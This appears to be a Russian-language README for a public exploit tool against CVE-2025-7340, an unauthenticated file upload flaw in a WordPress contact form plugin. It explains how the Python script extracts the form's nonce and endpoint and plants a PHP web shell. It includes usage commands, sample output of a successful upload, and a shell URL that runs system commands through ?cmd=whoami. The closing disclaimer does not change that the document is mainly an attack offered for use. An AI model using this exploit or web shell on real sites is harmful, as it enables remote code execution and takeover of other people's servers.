
HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. <= 2.2.1 — Неавторизованная произвольная загрузка файлов
CVE: CVE-2025-7340
CVSS: 9.8 (Критический)
Плагин HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файлов в функции temp_file_upload во всех версиях вплоть до 2.2.1 включительно.
Это позволяет неаутентифицированным злоумышленникам загружать произвольные файлы на сервер, что потенциально может привести к удалённому выполнению кода (RCE).
Этот репозиторий содержит Python-скрипт эксплойта, который автоматизирует обнаружение уязвимой формы и загружает веб-шелл на целевой сайт.
Скрипт автоматически определяет требуемые параметры (nonce, form_id, ajax endpoint) и загружает PHP-шелл в уязвимый путь.
✅ Пример URL уязвимой формы:
http://target.com/contact/
✅ Уязвимая форма должна находиться на странице, которую вы передаёте в опцию -u.
Перед запуском скрипта установите необходимые Python-модули:
pip install -r requirements.txt
Содержимое requirements.txt:
requests
colorama
usage: CVE-2025-7340.py [-h]
Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target URL e.g http(s)://target.com
| Параметр | Описание |
|---|---|
-h, --help | Показать это справочное сообщение и выйти |
-u, --url URL | Целевой URL, например http(s)://target.com/contact |
После успешного завершения эксплойта вы можете получить доступ к загруженному шеллу по указанному пути.
Добавьте ?cmd=<your_command>, чтобы выполнять системные команды.
✅ Пример:
http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami
Starting exploit against target...
Fetching target page...
Extracting parameters...
Extracted Nonce: 346c441903
AJAX Endpoint: http://nxploit.ddev.site/wp-admin/admin-ajax.php
Form ID: 86
Generating webshell...
Uploading shell, please wait...
[+] Exploit Successfully!
Go to: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php
Exploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited
Этот инструмент предоставляется только в образовательных и исследовательских целях.
Автор не несёт ответственности за любой ущерб или неправомерное использование этого кода.
Всегда получайте явное разрешение перед тестированием любой системы.
Khaled Alenazi (Nxploited)
GitHub: Nxploited